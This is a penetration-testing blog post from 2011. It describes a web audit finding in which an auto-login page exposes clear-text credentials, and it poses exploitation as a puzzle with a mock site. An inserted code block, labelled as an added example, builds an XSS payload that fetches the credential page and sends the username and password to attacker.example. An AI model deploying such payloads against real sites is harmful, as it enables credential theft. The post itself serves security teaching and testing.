Monday, February 7, 2011

Tricky exploit - a penetration test puzzle

In a recent application security audit of a web site I came across a big, glaring breach.
While it's always fun to find a good vulnerability, this one turned out to be quite tricky to actually exploit. The trickiness was not due to good security practices but to pure luck (or bad luck, depending on whose point of view you take). Every angle I tried seemed to be off by just a tiny bit.

Eventually I managed to find an interesting multi-phase exploit vector, and I think it makes for some interesting tinkering and reading. I've created a mock-up replica of the vulnerable web site to allow for testing and analysis. After reading the introductory section about the vulnerability, you may wish to try your wits against the mock site and find the exploit yourself, before reading on to the detailed exploit write-up.

The Target Site
This was your ordinary small company site.
It had 3 sub-systems:
1. a public site, available to any user.
2. a client site, requiring a login.
3. a printing system, requiring its own login.

After logging in to the client site, the user was shown a menu that contained a link to the printing system. To make things easier for the user, the link to the printing system would take the credentials previously given at the client login and pass them on to the printing system for authentication. A poor man's SSO, so to speak.

The Breach
It turned out that this "facilitating" method would pull the user's credentials and post them to the printing system in clear text, via a client-side redirect!

Initially the user supplies the login credentials to the client site (login.php).
If the login succeeds, a menu is presented (menu.php).
A click on the "Go to Printing" link directs the browser to an intermediate page (printAutoLogin.php) containing the user's credentials in a pre-filled form that is immediately auto-submitted to the printing system's login page (printSystem.php), which checks them for validity.


Figure 1. Client side SSO. First redirect fetches user credentials and passes them to Print System.

The breach is serious and obvious: the URL printAutoLogin.php returns the current user's name and password in clear text! This information is of course very valuable to an attacker. The only question remaining is: how does the attacker get it?

Exploitation Problems
Finding a breach is one thing. Showing a functional proof-of-concept attack that exploits it is sometimes quite another. While the breach is what the client actually pays for, it is the exploit that earns his respect and admiration. Usually getting a working exploit takes some dull, dirty work of fitting loose ends into place, but in this case it turned out to be an interesting puzzle.

What I wanted to do was leverage an XSS vulnerability I had found in the site to get the user credentials. One way to do this would be to steal the session cookie and use it to access the tell-tale URL myself, impersonating the legitimate user and obtaining his credentials (assuming no IP checks are done). The cookie was flagged HttpOnly, so script could not read it from document.cookie, which made this vector harder.

Another option was to fetch the credentials on the client side (using an XMLHttpRequest from within the victim's browser) and have them sent directly to the attacker. Since the browser attaches the session cookie to the request itself, this would sidestep the HttpOnly problem, and it would also be much cooler...

XSS flaws were abundant in practice. I found several around the site, but they were all just a bit off. Two were in different sub-domains, so the session cookie was not sent there and the same-origin policy blocked cross-(sub)domain XMLHttpRequest calls. Another XSS was actually in the same sub-domain but reachable only over HTTP, whereas the rest of the site was served over HTTPS, so again no cookie (it was flagged Secure) and no cross-protocol calls, since scheme is part of the origin.

Close but no cigar. Yet.
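The client-side vector described above, as an added example that is not part of the original post or the mock site: a payload that fetches printAutoLogin.php with XMLHttpRequest and reads the credentials out of the pre-filled form, together with the same-origin check that decides whether a given XSS location could run it at all. The field names (user, pass), the URLs and the sample HTML are assumptions for the sake of the example.

```javascript
// Added example (not from the original post or the mock site): the
// XMLHttpRequest vector from the text, plus the same-origin check that
// explains why the "just a bit off" XSS locations could not use it.
// URLs, field names and the sample HTML below are assumptions.

// Constructed stand-in for what printAutoLogin.php is described as
// returning: a form pre-filled with the logged-in user's credentials
// that submits itself to the printing system's login page.
const SAMPLE_AUTOLOGIN_HTML = `<html><body onload="document.forms[0].submit()">
<form method="POST" action="https://www.example.com/printSystem.php">
  <input type="hidden" name="user" value="user123">
  <input type="hidden" name="pass" value="pass123">
</form></body></html>`;

// Pull every <input> tag out of the HTML and map name -> value.
function parseFormInputs(html) {
  const fields = {};
  for (const tag of html.match(/<input\b[^>]*>/gi) || []) {
    const name = /\bname\s*=\s*["']([^"']*)["']/i.exec(tag);
    const value = /\bvalue\s*=\s*["']([^"']*)["']/i.exec(tag);
    if (name) fields[name[1]] = value ? value[1] : "";
  }
  return fields;
}

// The credentials the auto-login page leaks (field names are assumed).
function extractCredentials(html) {
  const f = parseFormInputs(html);
  return { user: f.user, pass: f.pass };
}

// Same-origin policy: scheme, host and port must all match for script on
// one page to read an XMLHttpRequest response fetched from the other.
function sameOrigin(a, b) {
  const ua = new URL(a), ub = new URL(b);
  return ua.protocol === ub.protocol &&
         ua.hostname === ub.hostname &&
         ua.port === ub.port;
}

// For each XSS location, say whether a payload there could read the
// auto-login page. This is the check the post walks through by hand.
function classifyXssLocations(target, xssPages) {
  return xssPages.map((page) => ({ page, usable: sameOrigin(page, target) }));
}

// The string that would actually be injected. Browser-only: the browser
// attaches the session cookie itself, so HttpOnly does not stop this
// path, but it only works when the injection point shares the target's
// origin. Credentials leave via an image request to an attacker URL.
function buildPayload(exfilUrl) {
  return (
    '<script>' +
    'var x=new XMLHttpRequest();' +
    'x.open("GET","/printAutoLogin.php",true);' +
    'x.onload=function(){' +
    'var u=/name="user"\\s+value="([^"]*)"/.exec(x.responseText);' +
    'var p=/name="pass"\\s+value="([^"]*)"/.exec(x.responseText);' +
    'new Image().src="' + exfilUrl + '?c="+' +
    'encodeURIComponent((u&&u[1])+":"+(p&&p[1]));' +
    '};x.send();' +
    '</script>'
  );
}

// Offline demonstration of the pieces (runs under Node, no browser needed).
console.log(extractCredentials(SAMPLE_AUTOLOGIN_HTML));
console.log(classifyXssLocations("https://www.example.com/printAutoLogin.php", [
  "https://www.example.com/search.php",   // same origin: usable
  "https://blog.example.com/post.php",    // other sub-domain: blocked
  "http://www.example.com/old.php",       // HTTP vs HTTPS: blocked
]));
console.log(buildPayload("https://attacker.example/log"));
```

Only the parsing and the origin check run under Node; the string returned by buildPayload is what an injected script would look like in the victim's browser, and it only works from a page on the same scheme, host and port as printAutoLogin.php, which is exactly the constraint none of the XSS locations above satisfied.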

Playground version
Before I continue describing the exploitation method I found, I offer you the chance to play around and find it yourself: I've recreated the relevant parts as a simplified mock web site that you can experiment with.

The website home page is:
Valid user credentials are: Name: user123, Password: pass123

You are welcome to stop reading and try your wit against it.
Note that this is not an armchair pen-test riddle. You'll have to get your proxies dirty to find some relevant details that I haven't described yet in order to figure it out.

Your goal is to find and craft an XSS payload that will cause the user credentials to be sent to the attacker (an alert box with the info would do).

Feel free to leave your comments.
Please post only non-spoiler comments here, and the rest on the solution entry.

The detailed exploitation is provided in a separate blog entry.


  1. Thank you for sharing, it's a very nice situation and setup. I'll play with it soon.

  2. Awesome! Congratulations!

  3. Yes, how the attacker creates "XSS PAYLOAD 2" is not so clear, and it only works with PHPSESSID=1337.
    Please explain how XSS Payload 2 is added to printAutoLogin.php's password field.
